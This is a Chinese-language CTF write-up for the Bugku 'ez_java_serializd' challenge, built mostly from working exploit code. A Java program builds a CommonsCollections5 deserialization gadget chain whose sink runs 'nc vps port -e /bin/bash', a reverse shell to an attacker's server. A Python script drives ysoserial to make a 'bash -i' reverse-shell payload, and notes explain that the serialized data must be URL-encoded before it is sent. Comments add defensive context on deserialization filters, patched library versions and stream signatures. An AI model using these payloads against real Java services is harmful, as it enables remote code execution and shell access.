bugku_ez_java_serializd

下载附件看到依赖CC3.1,没有waf,直接CC5打了。

package com.eddiemurphy;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;

public class Exp {

    /**
     * Builds a CommonsCollections5-style deserialization gadget chain against
     * commons-collections 3.1 (the version the write-up says the challenge
     * ships) and prints it Base64-encoded. Kept as a reference for what a
     * payload of this family looks like on the wire.
     *
     * <p>Why a plain {@code readObject} turns into code execution: every link
     * below is a class whose deserialization or {@code toString()} path calls
     * into the next one without checking what it was handed —
     * {@code BadAttributeValueExpException#readObject} calls {@code val.toString()},
     * {@code TiedMapEntry#toString} calls {@code getValue()}, which reads the
     * {@code LazyMap}, and a {@code LazyMap} miss runs its factory transformer,
     * i.e. the reflective {@code InvokerTransformer} chain.
     *
     * <p>Defensive notes: the reliable fixes are to not deserialize untrusted
     * bytes at all, or to install a {@code java.io.ObjectInputFilter} (JEP 290)
     * that rejects {@code org.apache.commons.collections.functors.*} and similar
     * gadget packages before {@code readObject} runs; commons-collections 3.2.2+
     * also refuses to deserialize {@code InvokerTransformer} unless explicitly
     * re-enabled. For detection, a serialized Java stream starts with the bytes
     * {@code AC ED 00 05} ({@code rO0AB} once Base64-encoded), and the side
     * effect of this chain is a child process spawned by the JVM that performed
     * the deserialization.
     *
     * @param args unused
     * @throws ClassNotFoundException if {@code javax.management.BadAttributeValueExpException} cannot be loaded
     * @throws IllegalAccessException if the {@code val} field cannot be written reflectively
     * @throws NoSuchFieldException   if the {@code val} field is not present (JDK layout change)
     * @throws IOException            if writing to the in-memory object stream fails
     */
    public static void main(String[] args) throws ClassNotFoundException, IllegalAccessException, NoSuchFieldException, IOException {
        // Transformer chain shared with the CommonsCollections1 payload: each
        // InvokerTransformer reflectively calls a method on the previous result
        // (Runtime.class -> getMethod("getRuntime") -> invoke -> exec).
        ChainedTransformer chain = new ChainedTransformer(new Transformer[]{
                new ConstantTransformer(java.lang.Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{
                        String.class, Class[].class}, new Object[]{
                        "getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{
                        Object.class, Object[].class}, new Object[]{
                        null, new Object[0]}),
// Sink: the string below is the argument the chain finally hands to Runtime.exec.
                new InvokerTransformer("exec",
                        new Class[]{String.class}, new Object[]{"nc vps port -e /bin/bash"})});
        // LazyMap.decorate registers the chain as the factory that runs on a cache miss.
        HashMap mmap = new HashMap();
        LazyMap tiemap = (LazyMap) LazyMap.decorate(mmap, chain);
        // TiedMapEntry.toString() calls getValue(), which does tiemap.get(1); key 1 is
        // absent from mmap, so the factory (the chain) is applied.
        TiedMapEntry mapEntry = new TiedMapEntry(tiemap, 1);   // trigger: BadAttributeValueExpException#readObject calls val.toString()

        // The constructor stores its argument via toString(), so passing mapEntry
        // directly would fire the chain locally; the field is set reflectively instead.
        BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(poc, mapEntry);
        // Serialize to memory and print as Base64; the write-up notes the output
        // still has to be URL-encoded once more before it is submitted.
        ByteArrayOutputStream output = new ByteArrayOutputStream();
        ObjectOutputStream outputStream = new ObjectOutputStream(output);
        outputStream.writeObject(poc);
        outputStream.close();
        byte[] bytes = output.toByteArray();
        String a = Base64.getEncoder().encodeToString(bytes);
        System.out.println(a);
    }
}

这里bash弹失败了,换nc才ok了,而且传payload的时候还要再一次url编码。

也可以直接ysoserial打,这里我好像bash也成功了,同时也记得把1.txt里的序列化数据url编码一下:

# Wraps ysoserial to generate a CommonsCollections5 payload and stores it
# Base64-encoded in 1.txt. Per the write-up, the file contents still have to
# be URL-encoded once more before they are sent.
import subprocess
import base64

# Run ysoserial through the shell. shell=True is tolerable only because the
# command is a fixed literal and no user-controlled text is interpolated into
# it; "<base64反弹shell>" is a placeholder the author substitutes by hand.
command = 'java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,<base64反弹shell>}|{base64,-d}|{bash,-i}"'
result = subprocess.check_output(command, shell=True)

# check_output returns the raw serialized stream as bytes; Base64-encode it
encoded_result = base64.b64encode(result)

# Write the encoded payload to 1.txt (binary mode: b64encode returns bytes)
with open('1.txt', 'wb') as file:
    file.write(encoded_result)

 

java题不好找啊,现在开始一个个审链子了。
